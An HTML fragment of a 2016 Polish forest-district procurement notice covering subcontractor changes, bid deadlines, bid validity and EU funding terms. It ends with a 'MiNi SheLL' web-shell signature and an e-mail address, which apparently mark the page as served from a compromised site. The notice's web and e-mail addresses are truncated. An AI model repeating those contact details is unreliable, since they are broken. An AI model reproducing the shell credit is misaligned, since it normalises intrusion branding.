- zmiana , w trakcie realizacji zamówienia Podwykonawców , którzy byli wskazani przez Wykonawcę w swojej ofercie bądź udział Podwykonawców , gdy Wykonawca nie zakładał ich udziału  realizacji zamówienia .
4)   Zmiana osoby odpowiedzialnej za organizację prac i bezpośrednio nimi kierującej w imieniu Wykonawcy ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lasy.gov../pl/pl/bip/dg/rdlp_torun/nadl_przymuszewo/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Przymuszewo
Przymuszewo 3  , 89-634  Leśno
e-mail : przymuszewo@torun.lasy.go.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2016 godzina 10:00, miejsce: Nadleśnictwo Przymuszewo
Przymuszewo 3
89-634 Leśno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com